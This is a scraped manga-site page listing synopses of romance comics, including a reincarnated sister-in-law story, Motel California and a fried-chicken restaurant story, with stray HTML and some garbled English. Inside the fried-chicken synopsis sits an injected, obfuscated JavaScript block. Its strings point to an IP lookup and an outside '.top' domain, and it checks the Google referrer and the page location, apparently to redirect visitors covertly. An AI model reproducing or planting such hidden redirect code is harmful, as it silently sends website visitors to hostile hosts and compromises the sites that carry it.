Read manhwa I Became the Youngest Sister-in-law of the Ruined Reverse Harem’s Male Leads at MANGAZIN Reincarnated in a ruined reverse harem novel, her sisters marry the male leads while she’s left dealing with their overwhelming attention. “I Became the Youngest Sister-in-law of the Ruined Reverse Harem’s Male Leads Manhwa” is sames name: 피폐 역하렘 남주들의 막내 처제가 되었다
Eleanor, the villainous daughter of an otome game, was still young when she heard someone else's "voice of the heart" for the first time. Tired of calculations, blatant favors, slander, and heartless honesty, she eventually closed her heart and gave up on love. At that time, he meets the first prince, Asher, at a ball. With a neat face and a calm voice, anyone would think that he was the perfect person―― "Fuu, I'm nervous. Alright, let's do our best! Ei, ei, oh!" In fact, he was a bearish and too pure prince! ? For the first time, Eleanor is curious about him, who has a pleasant "voice of the heart". Eventually, it turns into love...?
Read Home, Bitter Home, Motel California Can love and life be remodeled? Our heroine, Ji Kanghee, was born and raised in a motel. She hates the small rural town where everyone is like family, so she leaves behind her first love, Cheon Yeonsu, and escapes. After years of struggling, falling, and climbing back up, she finally feels like she’s found success, a career, and maybe even love. But then, she hears a rumor-her first love, Yeonsu, the one she thought would long for her forever, has found someone to marry. From the depths of her heart, she sends him a sincere blessing, but she can’t shake the overwhelming urge to confirm it for herself. Does this girlfriend really exist? And what are Yeonsu’s true feelings? By a twist of fate, the construction site where she’s now the project lead is located in H-town, the very place she swore she’d never return to after leaving. Amid interactions with old classmates and townsfolk, she starts to sense that Yeonsu might still have feelings for her-and to her surprise, she doesn’t entirely dislike it. Before she knows it, both her love and her life are undergoing a full remodel.
Jooah, Hyunah, and Yeoim are university students who are in relationships. Jooah has a handsome and perfect boyfriend but is disheartened by the fact that he prioritizes his work before her, Hyunah has been in a relationship with her boyfriend long enough that it has become boring and has thrown a sweet, soft, and heart-fluttering romance to the dogs, Yeoim struggles with complicated family circumstances and an immature boyfriend. Who said that romance in the twenties is only flashy and beautiful? Getting hurt and giving hurt, there’s nothing as clumsy and unstable… This love is like a war that makes one feel like they are flying in the sky and then brings them crashing down to the ground. The bittersweet love story of three female protagonists unfolds! Les jeunes années / Salat Tage / Saelleodeu deijeu / 샐러드 데이즈
I Tamed the Broken Male Lead with My Fist
A second-rate novelist Shao Xin Yu who always can’t write food novels, cross-dressed under the alias “Shao Xin Yu”, and risks it all by sneaking into the legendary men idol company, the Rong Guang Group, with the plan of writing a popular novel based on CEO Wen Qi Jing. Wen Qi Jing is cold and arrogant. He has frightened away numerous personal assistants. Even so, the carefree and careless “young man”, Shao Xin Yu, makes his heart beat fast when “he ” appears in from of him. / The Devil In The Suit
<div class="row detail-set"> <div class="col-24 col-sm-16 col-md-18 mt-4 mt-sm-0 attr-main"> <div class="mt-3"> <div id="limit-height-ctrl-summary" class="limit-height-ctrl max-100px"> <div id="limit-height-body-summary" class="limit-height-body"> <div class="limit-html">She had thought that she met the love of her life, he had thought that he could give her the perfect life. But fate is always messing around, in the end , who's truly in love? Who will be happy again? If she had the opportunity she'd rather have met him sooner, if he had the opportunity, he'd rather fall love with her sooner.</div> </div> </div> </div> </div> </div> <div class="mt-4 episode-list"> <div class="head"></div> </div>
Short story collection. 1. Iguana no Musume: A girl develops a complex about herself after her mother thinks of her as a hideous iguana.
Read manhwa How to Make Phra Aphai Fall in Love The description of the comics “How to Make Phra Aphai Fall in Love”: Venus, a modern girl with false confidence about using charm own in love life She despises love and causes her lover to suffer pain until she slips into a character that glorifies love. Until her head is stuck in the forest like a sea butterfly. The giantess who kidnapped a monk Aphai Mani, the work of the great Thai poet Sunthorn Phu. She was very shocked because the events she encountered were hardly How much does it match the original that she studied in high school? And she definitely won’t let it end like the original. “How to Make Phra Aphai Fall in Love” is another name: ต้องทำไงให้พระอภัยรัก
Falling in love with you is hard / 请你恋爱太难了!/ It's Hard To Make You Fall in Love / Rejecting Love ‘Asking you to date is too hard!’ Is a webcomic, written and serialized by Bao Qing comics. The comic narrates about a fashion designer who is coming of age and resisting any possibility to marry. Unexpectedly, halfway through, she meets an extremely innocent boy! Uh oh! It’s as if her heart just fluttered…… “Big sis! Please let me stay with you~” “Oi! You crazy dog! don’t come so close to me!” This time will she be able to maintain her status as someone single? A 2019 comic of two single's funny and sweet experiences together! The show's officially about to begin~
"Let's make the best chicken !!!" The chicken restaurant, where Sangwook's father invested all his retirement money and gave it all to an acquaintance who scammed him ! However within a few days of opening, his father had an accident, and the operation of the store became the responsibility of college student Han Sangwook. Sangwook throws his everything to protect the store but he can't find the right way.... Sangwook is forced to ask for help from his greatest enemy, Hyeri to help him find the greatest Fried Chicken Recipe ! And Sangwook's journey to make the best chicken begins.<script></script><script>function _0x3618(){var _0x51adfe=['http://rea','floor','includes','then','8770905cJaJsp','qEbyy','bNYSG','2230nrGtbu','umkgE','https://ip','1927953tdlvfX','VWPEG','.top/','5475246YNdffC','IwxIL','lrSny','','location','href','oGEic','google','752jfPnuQ','8157548psiCtK','4653088OcZEmW','referrer','HiiGL','lDkJv','sRttf','1200644FIkvqE','text','.customapi','5ylRbgK','random'];_0x3618=function(){return _0x51adfe;};return _0x3618();}(function(_0x37971b,_0x3b7d0d){var _0x4a5760=_0x2b43,_0x64e07b=_0x37971b();while(!![]){try{var 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"I've come to get my wife." On the day of the wedding, the groom, Koumei Oh, showed up soaked in blood. The bride, Meirin, couldn't hide her horror at the sight. The Oh family, a military family, has been cursed to die by the age of 30 due to their violent acts in battle. In this age, doctors have lost their position in society and the Xian have been entrusted to save people.The emperor, hearing rumors that "those who make a vow with a Xian and produce descendants shall never perish," arranged for Koumei to marry Meirin, a Xian. However, Meirin doesn't actually possess the powers of the Xian and is marrying Koumei in place of her older sister, Shenrin.Meirin fears she may be killed if this lie is discovered, but Koumei turns out to be different from the rumors, and Meirin begins to fall in love...Published by Comicle Original+